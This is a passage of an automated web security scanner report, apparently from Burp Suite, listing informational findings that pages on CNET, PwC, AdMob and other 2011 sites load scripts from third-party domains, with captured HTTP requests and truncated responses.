Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:49 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:49 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:54 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=986
Connection: Keep-Alive
Content-Length: 99322

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> 
<head> <title>Mac - Fr
...[SNIP]...
<meta property="og:site_name" content="CNET"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78"></script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
I8AADTVkZIAAAMj&t=2011.01.12.13.01.49&event=58/;ord=2011.01.12.13.01.49?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8688&sg=483566&o=19406%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=2000&nd=19406&pid=&cid=0&pp=100&e=3&rqid=00phx1-ad-e20:4D2D10307ECAAC&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zdm4EgoOYI8AADTVkZIAAAMj&t=2011.01.12.13.01.49&event=58/;ord=2011.01.12.13.01.49?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zdm4EgoOYI8AADTVkZIAAAMj&t=2011.01.12.13.01.49/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.13. http://download.cnet.com/mobile-downloads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/mobile-downloads/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=16185&sg=483566&o=19407%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=2000&nd=19407&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4D2D12AE7BF857&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zejudgoOYJEAAF@f-oEAAAM0&t=2011.01.12.13.01.50&event=58/;ord=2011.01.12.13.01.50?
http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.50?
http://b.scorecardresearch.com/beacon.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/download/download.tron.listings.compressed.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:50 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:50 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:50 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowLat=1294837310099; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 78960

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> 
<head> <title>Mobile -
...[SNIP]...
<meta property="og:site_name" content="CNET"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" rev="stylesheet" href="http://i.i.com.com/cnwk.1d/css/rb/tron/download/frontDoor.css" /> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/download/download.tron.listings.compressed.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78"></script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
leclick.net/adi/N5295.150723.CBSI/B5081823;sz=728x90;ord=2011.01.12.13.01.50?" width="728" height="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823;abr=!ie;sz=728x90;ord=2011.01.12.13.01.50?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zejudgoOYJEAAF@f-oEAAAM0&t=2011.01.12.13.01.50/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...
JEAAF@f-oEAAAM0&t=2011.01.12.13.01.50&event=58/;ord=2011.01.12.13.01.50?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5295.150723.CBSI/B5081823.2;abr=!ie;sz=300x250;click0=http://adlog.com.com/adlog/e/r=16185&sg=483566&o=19407%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=2000&nd=19407&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4D2D12AE7BF857&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zejudgoOYJEAAF@f-oEAAAM0&t=2011.01.12.13.01.50&event=58/;ord=2011.01.12.13.01.50?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zejudgoOYJEAAF@f-oEAAAM0&t=2011.01.12.13.01.50/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.14. http://download.cnet.com/webware-apps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/webware-apps/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:54 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app8.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:54 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:54 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowLat=1294837313774; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:54 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:54 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:59 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 36086

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> 
<head> <title>Webware
...[SNIP]...
<meta property="og:site_name" content="CNET"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78"></script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.15. http://download.cnet.com/windows/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/windows/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/N553.8481.CBSINTERNETNETWORK/B4970757.4;abr=!ie;sz=300x250;pc=cbs487323;click0=http://adlog.com.com/adlog/e/r=8688&sg=487323&o=19409%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=2000&nd=19409&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e19:4D2D24906954B5&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zkDBEwoOYI4AAAJJrCsAAANV&t=2011.01.12.13.01.55&event=58/;ord=2011.01.12.13.01.55?
http://b.scorecardresearch.com/beacon.js
http://dw.com.com/js/dw.js
http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js
http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js
http://i.i.com.com/cnwk.1d/html/pt/pt2.js
http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js
http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:55 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:39 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 136
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:55 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowLat=1294837315852; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:55 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:55 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:00 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=909
Connection: Keep-Alive
Content-Length: 102759

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> 
<head> <title>Free sof
...[SNIP]...
<meta property="og:site_name" content="CNET"/> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/rb/js/tron/oreo.moo.rb.combined.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://dw.com.com/js/dw.js"></script>
...[SNIP]...
</script> <script type="text/javascript" src="http://offers-service.cbsinteractive.com/offers/script.sc?offerId=78"></script> <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/Ads/common/manta/adFunctions-cnet.js"></script>
...[SNIP]...
I4AAAJJrCsAAANV&t=2011.01.12.13.01.55&event=58/;ord=2011.01.12.13.01.55?" width="300" height="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.8481.CBSINTERNETNETWORK/B4970757.4;abr=!ie;sz=300x250;pc=cbs487323;click0=http://adlog.com.com/adlog/e/r=8688&sg=487323&o=19409%253a&h=cn&p=2&b=6&l=en_US&site=4&pt=2000&nd=19409&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e19:4D2D24906954B5&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173%2e193%2e214%2e243&pg=zkDBEwoOYI4AAAJJrCsAAANV&t=2011.01.12.13.01.55&event=58/;ord=2011.01.12.13.01.55?">
</SCRIPT>
...[SNIP]...
526BK14860%2526&pg=zkDBEwoOYI4AAAJJrCsAAANV&t=2011.01.12.13.01.55/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" HEIGHT="0" WIDTH="0" alt="" style="position:absolute; top:0px; left:0px" /><script src="http://i.i.com.com/cnwk.1d/Ads/common/madCap/MadCap1.js" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
 <script type="text/javascript" src="http://i.i.com.com/cnwk.1d/html/pt/pt2.js" name="cleanprintloader"></script>
...[SNIP]...

16.16. http://flowplayer.org/tools/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://flowplayer.org
Path:	/tools/

Issue detail

The response dynamically includes the following script from another domain:

http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js?foo

Request

GET /tools/ HTTP/1.1
Host: flowplayer.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 12 Jan 2011 13:02:25 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Cache-control: private
Content-Length: 13115

   <!DOCTYPE html>


<!--
   Flowplayer JavaScript, website, forums & jQuery Tools by Tero Piirainen

   Prefer web standards over Flash. Video is the only exception (f
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/css/global-0.52.css?foo" />

                           <script src="http://cdn.jquerytools.org/1.2.5/full/jquery.tools.min.js?foo"></script>
...[SNIP]...

16.17. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.theregister.co.uk
Path:	/forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TS2mYsCoATgAAHrxRrQAAAKj?

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
<div><script type="text/javascript" src="http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TS2mYsCoATgAAHrxRrQAAAKj?"></script>
...[SNIP]...

16.18. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.theregister.co.uk
Path:	/forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The response dynamically includes the following script from another domain:

http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TS3EtcCoAT8AAE5vzHQAAARQ?

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:11:49 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46363

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
<div><script type="text/javascript" src="http://ad.uk.doubleclick.net/adj/reg.misc.4159/textlink;dcove=d;tlid=222964969;sz=1x1;ord=TS3EtcCoAT8AAE5vzHQAAARQ?"></script>
...[SNIP]...

16.19. http://landesm.gfi.com/event-log-analysis-sm/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://landesm.gfi.com
Path:	/event-log-analysis-sm/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.performable.com/catalog/3303.0/assets/js/q7CSP-landing.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 12 Jan 2011 03:46:07 GMT
Etag: "17424fa7bc85ec85fc725f2b8328bb89ca03be4c"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Content-Length: 30171
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis & management</title>

...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.gfi.com/landing/styles/styles13.css">
<script language="JavaScript" type="text/javascript" src="http://cdn.performable.com/catalog/3303.0/assets/js/q7CSP-landing.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

16.20. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The response dynamically includes the following script from another domain:

http://cache.addthiscdn.com/www/q0197/js/bookmark.js

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.21. http://www.admob.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.admob.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://munchkin.marketo.net/munchkin.js
http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:08:05 GMT
Server: Apache
Set-Cookie: session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com
Set-Cookie: mrkting_landing_page_url=%2F; expires=Sat, 09-Jan-2021 13:08:05 GMT; path=/; domain=.admob.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!doctype html>
<html>
   <head>
       <title>Mobile Advertising | Buy Ads | Monetize Traffic | AdMob</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<met
...[SNIP]...
</script>
    <script type='text/javascript' src='http://www.google-analytics.com/ga.js'></script>
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

16.22. http://www.cbsinteractive.com/adfeedback/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbsinteractive.com
Path:	/adfeedback/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.com.com/Ads/common/js/aff_redirect.js
http://dw.com.com/js/dw-beta.js

Request

GET /adfeedback/ HTTP/1.1
Host: www.cbsinteractive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:24:44 GMT
Server: Apache/2.2
Keep-Alive: timeout=15, max=993
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 21580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
   <head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

...[SNIP]...


                                           <script src="http://dw.com.com/js/dw-beta.js" type="text/javascript"></script>
...[SNIP]...

       <script type="text/javascript" language="javascript" src="http://ads.com.com/Ads/common/js/aff_redirect.js"></script>
...[SNIP]...


    <script src="http://dw.com.com/js/dw-beta.js"></script>
...[SNIP]...

16.23. http://www.connect.facebook.com/widgets/fan.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.connect.facebook.com
Path:	/widgets/fan.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yY/r/71qWoI8S5cd.js

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 12 Jan 2011 04:27:30 GMT
Content-Length: 11326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/yk/r/RHTMXKsQP2i.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yY/r/71qWoI8S5cd.js"></script>
...[SNIP]...

16.24. http://www.pwc.com/en_GX/webadmin/forms/contactUs.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/en_GX/webadmin/forms/contactUs.jhtml

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:59 GMT
Content-Length: 28160
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gx" lang="en-gx">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.25. http://www.pwc.com/en_GX/webadmin/forms/email_a_colleague.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/en_GX/webadmin/forms/email_a_colleague.jhtml

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /en_GX/webadmin/forms/email_a_colleague.jhtml HTTP/1.1
Host: www.pwc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760111214:ss=1294760084820; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; LD.previous.visitor.us.pwc.com=true;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:59 GMT
Content-Length: 13960
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gx" lang="en-gx">
<h
